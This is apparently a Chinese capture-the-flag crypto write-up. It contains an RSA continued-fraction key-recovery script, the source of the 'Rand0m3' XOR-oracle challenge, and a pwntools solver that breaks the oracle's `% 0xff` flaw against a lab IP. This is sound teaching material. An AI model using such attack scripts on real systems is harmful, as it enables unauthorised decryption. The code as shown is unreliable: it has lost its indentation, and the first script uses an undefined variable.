import gmpy2
import libnum
from tqdm import tqdm
N1 = 112187114035595515717020336420063560192608507634951355884730277020103272516595827630685773552014888608894587055283796519554267693654102295681730016199369580577243573496236556117934113361938190726830349853086562389955289707685145472794173966128519654167325961312446648312096211985486925702789773780669802574893
N2 = 95727255683184071257205119413595957528984743590073248708202176413951084648626277198841459757379712896901385049813671642628441940941434989886894512089336243796745883128585743868974053010151180059532129088434348142499209024860189145032192068409977856355513219728891104598071910465809354419035148873624856313067
e = 86905291018330218127760596324522274547253465551209634052618098249596388694529
enc1 = 71281698683006229705169274763783817580572445422844810406739630520060179171191882439102256990860101502686218994669784245358102850927955191225903171777969259480990566718683951421349181856119965365618782630111357309280954558872160237158905739584091706635219142133906953305905313538806862536551652537126291478865
# c = continued_fraction(int(N2) / int(N1))
# sage里int不太对
c = continued_fraction(Integer(N2) / Integer(N1))
for i in tqdm(range(1, 211)):
a2 = c.denominator(i)
k = c.numerator(i)
if gmpy2.gcd(k, e) != 1:
continue
tmp = gmpy2.invert(k, e)
res = (-1*tmp) % e
phi_ = crt(res, 0, e, a2)
bound = e * a2 // gmpy2.gcd(e, a2) # lcm
phi1 = phi_ + (N1 // bound) * bound - 100 * bound # phi1
for j in range(211):
if gmpy2.gcd(e, st) != 1:
phi1 += bound
continue
d1 = gmpy2.invert(e, phi1)
flag = libnum.n2s(int(pow(enc1, d1, N1)))
if b"flag" in flag:
print(flag)
phi1 += bound
Rand0m3 (200)
题目
#!/usr/bin/python3
# Rand0m3
import os, sys
import struct
def _print(content, end = None):
if end != None:
print(content, end = end)
else:
print(content)
sys.stdout.flush()
def read_flag():
with open("flag", "r") as f:
res = f.read()
return res
def print_prompt():
_print("1. encrypt input")
_print("2. decrypt input")
_print("3. encrypt flag")
_print("4. exit")
_print(">> ", end = "")
def read_int():
return int(read_string())
def read_string():
return input().strip()
def get_random_u8(): # get_random_u8()??
return struct.unpack("<B", os.urandom(1))[0]
def encrypt(s, k):
res = ""
if k <= len(s):
_print("[!] key shold be larger then len(pt) for safty!!")
return ""
for i, c in enumerate(s):
enc = (get_random_u8() + k * i) % 0xff
enc = ord(c) ^ enc
res += hex(enc)[2:].rjust(2, "0")
return res
def decrypt(s, k):
_print("[*] Give me the paper about predicting urandoGive me the paper about predicting urandomm")
_print("[*] ...Then i'll decrypt your input ;)")
return ""
if __name__ == "__main__":
flag = read_flag()
while True:
print_prompt()
c = read_int()
if c == 1:
_print("key >> ", end = "")
key = read_int()
_print("pt >> ", end = "")
pt = read_string()
_print("result : %s"%encrypt(pt, key))
elif c == 2:
_print("key >> ", end = "")
key = read_int()
_print("ct >> ", end = "")
ct = read_string()
_print("result : %s"%decrypt(ct, key))
elif c == 3:
_print("key >> ", end = "")
key = read_int()
_print("result : %s"%encrypt(flag, key))
elif c == 4:
_print("bye!!")
exit(0)
else:
_print("invalid option...")
题解
巧,上个月刷到原题了,当时没写出来
赛后跟着wp尝试复现了下,居然撞上了
察觉后,觉得略有不同,在交互上卡了好一会,最后发现确实是一致的
想清楚了,思路也清晰
首先,关注题目中的加密代码
def encrypt(s, k):
res = ""
if k <= len(s):
_print("[!] key shold be larger then len(pt) for safty!!")
return ""
for i, c in enumerate(s): # i 为index位置, c为s[i]
enc = (get_random_u8() + k * i) % 0xff # 0到254
enc = ord(c) ^ enc # 唯独不可能与0b11111111异或
res += hex(enc)[2:].rjust(2, "0") # 补齐两位
return res
破题点在于% 0xff ,这样导致第一步的enc范围固定下来,只能是0到254
其后,enc = ord(c) ^ enc ,那么ord(c) 就不可能与0b11111111(255)异或
所以为确定一位flag字符,只要进行多次encrypt,在0到255中排除到只剩1个数,它就是flag[i]^255(key不妨就设为255)的结果
那么,都确定好后,根据异或可逆性质再异或回来即可
from pwn import *
p = remote('172.16.30.220', 58005) # 记得改ip 端口
key = 255
p.sendlineafter('>> ', '3') # 模式3
p.sendlineafter('key >> ', '255') # 输入key值
p.recvuntil('result : ') # 准备接受enc(flag, key)
enc_flag = p.recvline()
flag_len = len(enc_flag) // 2
flag_set = [list(range(256)) for _ in range(flag_len)] # 存放每一位可能的flag_enc
flag = [0 for x in range(flag_len)] # flag初始化为一串0
while True:
p.sendlineafter('>> ', '3')
p.sendlineafter('key >> ', '255')
p.recvuntil('result : ')
enc_flag = bytes.fromhex(p.recvline()[:-1].decode())
for i in range(flag_len):
if flag_set[i].count(enc_flag[i]) == 1:
flag_set[i].remove(enc_flag[i])
if len(flag_set[i]) == 1:
flag[i] = chr(flag_set[i][-1] ^ key)
print([len(x) for x in flag_set])
if 0 not in flag: # 校验完毕
break
print(''.join(flag))
|